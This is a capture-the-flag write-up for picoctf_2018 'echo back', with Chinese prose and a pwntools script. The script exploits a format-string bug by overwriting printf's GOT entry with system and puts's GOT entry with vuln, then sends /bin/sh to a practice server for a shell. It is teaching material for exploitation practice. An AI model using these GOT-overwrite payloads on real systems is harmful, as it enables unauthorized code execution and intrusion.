picoctf_2018_echo back
查看保护
有个格式化漏洞
攻击思路：利用格式化字符串漏洞把 printf 的 GOT 表项改成 system，但漏洞点只能触发一次，改完之后不会再有新的输入送进 printf。因此有两种做法：改 .fini_array 让程序退出前再回到 vuln，或者（本文采用）同时把后面被调用的 puts 的 GOT 表项改成 vuln 的地址，让程序再执行一遍 vuln；第二次输入 /bin/sh 时，printf("/bin/sh") 实际执行的就是 system("/bin/sh")，从而 getshell。前提是 GOT 可写（checksec 显示非 Full RELRO），这一点需要先确认。
from pwn import *
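context(arch='i386', os='linux', log_level='debug')  # debug log shows every byte sent/received
file_name = './z1r0'
# NOTE(review): the flag's name is inverted relative to its meaning — a truthy
# value selects the *remote* service, a falsy one the local process. Kept as-is
# so behaviour is unchanged; set it to 0 to run and gdb-attach locally.
debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27771)
else:
    r = process(file_name)
elf = ELF(file_name)  # loaded for symbol/GOT lookups (addresses below are still hard-coded)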
def dbg():
    """Attach GDB to the live target `r` (only useful when `r` is a local process)."""
    target = r
    gdb.attach(target)
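offest = 7  # (sic) stack slot where our buffer begins in printf's argument list; the %N$ indices below hard-code it
printf_got = 0x0804A010
puts_got = 0x0804A01C
vuln_addr = 0x080485AB

# Four pointers fill slots 7..10; every %N$hn then stores the low 16 bits of the
# running character count into the address held in slot N. Counts are
# cumulative: 16 (the pointers) + 2036 = 2052 = 0x0804, +31836 = 33888 = 0x8460,
# +331 = 34219 = 0x85AB. The whole payload is 56 bytes and must fit in the
# program's read buffer (size not visible here).
p1 = p32(printf_got + 2) + p32(printf_got + 2) + p32(printf_got) + p32(puts_got)
p1 += b'%2036c%7$hn'    # printf_got+2 := 0x0804 (upper half; needed if printf already resolved into libc)
p1 += b'%8$hn'          # slot 8 also points at printf_got+2, so this repeats the same write — redundant but harmless
p1 += b'%31836c%9$hn'   # printf_got := 0x8460 -> 0x08048460, presumably system@plt; TODO confirm against elf.plt['system']
p1 += b'%331c%10$hn'    # puts_got := 0x85AB -> 0x080485AB = vuln_addr, so the following puts() re-enters vuln

# pwntools expects bytes; passing str here only works via an implicit ASCII
# fallback that newer versions warn about.
r.recvuntil(b'message:\n')
r.send(p1)
# Per the writeup, puts() now jumps back into vuln(), which prompts once more.
# This second input reaches the hijacked printf, i.e. system("/bin/sh").
r.recvuntil(b'message:\n')
r.sendline(b'/bin/sh\x00')  # NUL terminates the command so the newline appended by sendline is not part of it
r.interactive()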